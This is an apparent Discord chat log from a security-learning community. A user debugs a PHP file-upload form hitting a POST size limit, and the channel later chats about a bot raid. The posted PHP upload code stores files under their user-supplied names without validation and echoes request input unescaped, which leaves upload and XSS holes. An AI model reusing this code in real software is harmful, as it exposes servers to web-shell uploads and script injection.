stark oyster
#

GM

bold dawn
#

Request Entity Too Large
The requested resource does not allow request data with POST requests, or the amount of data provided in the request exceeds the capacity limit.

#

not wordpress, LAMP

loud marlin
bold dawn
#

tried all of those lol

loud marlin
#

fair heh

#

tried to relogin after change

bold dawn
#

hang on

loud marlin
#

since it might take permissin from current session...

bold dawn
#
  <form id="upload_form" enctype="multipart/form-data" method="post">
  <input type="file" name="csv_file" id="csv_file" onchange="uploadFile()"><br>
  <input type="submit" name="submit">

</form>
<?php
        if (isset($_POST['submit'])) {
            echo "<p>" . $_POST['csv_file'] . " => file input successfull</p>";
            $target_dir = "../uploads/";
            $file_name = $_FILES['csv_file']['name'];
            $file_tmp = $_FILES['csv_file']['tmp_name'];

            if (move_uploaded_file($file_tmp, $target_dir . $file_name)) {
                echo "<h1>File Upload Success</h1>";
            } else {
                echo "<h1>File Upload not successfull</h1>";
            }


        }


?>
loud marlin
#

try make some directory with 777 ? and manual drag and drop ?

bold dawn
#

See I can FTP successfully

#

FTP is fine. I'm getting limited by the POST request limitation. I changed all the settings I should have. Cloudflare shouldn't block it unless it's over 100mb. This file is 20mb

loud marlin
#

weird

bold dawn
#

10mb works, so I'm assuming for some reason 20 is the cutoff

cerulean coral
#

Where do i find the attackbox public IP and password? To SSH via my machine

rapid merlin
rapid merlin
#

Yeee

sick lance
#

It's a new UI, but the details are the same.

loud marlin
umbral bay
hardy mica
#

Anyway guys , if you want have fun , go try the 3M room

sick lance
#

Do what?

rapid merlin
#

I think he was reacting to heap

rapid merlin
#

Lol

#

Bro copied my message and sent it

sick lance
#

👀

rapid merlin
#

@sick lance

#

What is happening

sick lance
#

Already aware 😄

rapid merlin
#

what happens here

#

copied messages

sick lance
rapid merlin
#

nice

#

do you know what it was?

#

@sick lance

#

tf is this?

wooden totem
#

They both expect input from you and send you the output

naive violet
loud marlin
#

dheck lol

wooden totem
#

I must follow the herd

naive violet
wooden totem
#

The hivemind got to me for a second

rapid merlin
#

Discord Raid Protection / AutoMod doing well ig

wooden totem
#

Totally real accounts

wooden totem
loud marlin
#

wtf is going on lol

wooden totem
#

Bot raid

#

Someone has too much time

tawny magnet
#

eh

wooden totem
#

It would be really funny if 100 messages per second were sent in all channels

mossy river
#

What are you doing? lol

#

Why would that be funny

naive violet
wooden totem
#

Idk what that type of joke is called really, its like "it would be funny if something bad would happen rn"

mossy river
#

I’d call it insinuation 😄

hardy mica
blazing granite
gusty viper
#

more lanes and faster transfer rate for peripherals

loud marlin
#

raids are newer funny at all

hardy mica
mossy river
wooden totem
#

I would more say ironic ig? Yall never said "ha, funny" when something super unlucky happened to you?

blazing granite
#

I've been in a real raid not funny at all

loud marlin
#

fun fun fun 🙂

sick lance
#

-.- that was meant for the search.

mossy river
#

Oh no

loud marlin
#

only fun raid is WOW 40man raid 🙂

hardy mica
mossy river
#

Scrubz has been taken

wooden totem
#

(Hivemind has broken through)

sick lance
#

I was supposed to keep them in-line, not join them.

rapid merlin
#

I always knew scrubz is the imposter!

hardy mica
#

Among us

wooden totem
#

Scrubz do you have your 2fa

sick lance
rapid merlin
hardy mica
#

Imagine a discord bot in a discord full of programmers that doesnt work

#

THAT

wooden totem
#

I was gonna make a cool quote but it didn't sound cool enough

hardy mica
#

would be funny

blazing granite
# hardy mica i agree

I was a teenager and I was in a club, and the club suddenly was raided, I was 18 but I'm short and I look younger that actually I'm so I was 18 and looked like 12. The first thing I heard is WTF are you doing here? Where are your parents?

wooden totem
hardy mica
wooden totem
#

A leak is a leak

grim sparrowBOT
#

Done!

grim sparrowBOT
tawny magnet
hardy mica
wooden totem
#

These bots are trash

#

Bro spent 10 dollars

hardy mica
#

Go botting roblox discord . It'd be surely more effective

rapid merlin
#

Nah

#

Don't bot

blazing granite
hardy mica
blazing granite
hardy mica
#

my life is boring but not so boring to join a discord raid

wooden totem
#

I changed that, before sounded weird

hardy mica
devout palm
hardy mica
#

13 years old botter be like :"hey look friends , im a powerful hackerz now"

wooden totem
#

It's not their script

hardy mica
wooden totem
#

You can buy these for pretty cheap

#

(I don't condone to buying illegal services)

hardy mica
#

but he'll build a fantastic story where they are hacker botting discord and admins are dragons spitting fire

rapid merlin
#

Not raiding discord servers

hardy mica
rapid merlin
hardy mica
#

omg , 7 years ago

#

was published*

rapid merlin
#

Ah

#

7 indeed